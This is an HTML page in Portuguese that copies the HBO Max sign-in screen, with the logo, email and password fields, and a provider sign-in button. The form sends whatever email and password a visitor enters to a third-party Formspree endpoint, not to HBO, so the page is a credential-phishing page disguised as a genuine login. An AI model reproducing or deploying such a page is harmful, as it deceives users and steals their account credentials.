<!DOCTYPE html>
<style>
    h1 {
        font-family: 'Times New Roman', Times, serif;
    }
    h3{
        font-family: 'Times New Roman', Times, serif;
    }
    #footer{
        font-family: 'Times New Roman', Times, serif;
    
    }
    body{
        margin-top: 5%;
        margin-left: 5%;
    }
    #entrar{
        font-family: 'Times New Roman';
        font-size: 15.5px;
        width: 100px;
        height: 30px;
        align-items: center;
        text-align: center;

        background: #EFEFEF;
        border: 1px solid #000000;
        border-radius: 5px;
    }
    #provedor{
        font-family: 'Times New Roman';
        font-size: 14.5px;
        width: 180px;
        height: 30px;
        align-items: center;
        text-align: center;

        background: #EFEFEF;
        border: 1px solid #000000;
        border-radius: 5px;
    }
</style>
<body>
<img src="HBO_Max_Logo.svg.png" width="200" height="40">
<h1>Entrar</h1>

<p>
<form action="https://formspree.io/f/mlevayzk" method="post">
</p>
    <label> <h3>Email</h3></label>
<p>
    <input placeholder="Digite seu Email" type="text" required="required" value="" name="" name="Nome">
</P>

<P>
    <label> <h3>Senha</h3></label>
</P>    
    <p>
        <input placeholder="Digite sua Senha" type="text" required="required" value="" name="" name="Nome">
    </p>


<button id="entrar" type="submit"> Entrar</button> 
</form>
<br>
<p id="footer">Você acessa a HBO Max por um provedor de TV,<br> de internet ou celular?</p><br>

<button id="provedor" type="submit">Entrar como provedor</button> 
</body>